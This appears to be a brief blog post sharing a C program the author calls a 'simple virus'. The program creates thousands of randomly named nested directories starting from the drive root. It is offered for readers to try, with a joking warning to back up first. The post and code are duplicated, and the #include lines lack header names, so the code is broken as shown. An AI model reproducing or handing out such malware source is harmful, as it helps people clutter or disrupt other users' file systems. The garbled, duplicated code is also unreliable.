oke ..this a new program ..this is script program make to simple virus. I learned from a friend..
ehhmmmm.......you're curious???? hehehe...
notice ..Never execute this program on your HD before you backup file or acktife deepfreez in your hard drive...hehehe^_^
oke...this is a script..
#include
#include
#include
main()
{
int i,j;
char tmp[20];
char far *ptr;
for (i=0;i<=50;i++){
srand(rand());
ptr = itoa(rand(),tmp,10);
mkdir ( ptr );
chdir ( ptr );
for (j=0;j<=50;j++){
ptr = itoa(rand(),tmp,10);
mkdir( ptr );
}
chdir ("\\");
}
}
ehhmmmm.......you're curious???? hehehe...
notice ..Never execute this program on your HD before you backup file or acktife deepfreez in your hard drive...hehehe^_^
oke...this is a script..
#include
#include
#include
main()
{
int i,j;
char tmp[20];
char far *ptr;
for (i=0;i<=50;i++){
srand(rand());
ptr = itoa(rand(),tmp,10);
mkdir ( ptr );
chdir ( ptr );
for (j=0;j<=50;j++){
ptr = itoa(rand(),tmp,10);
mkdir( ptr );
}
chdir ("\\");
}
}


Posting Komentar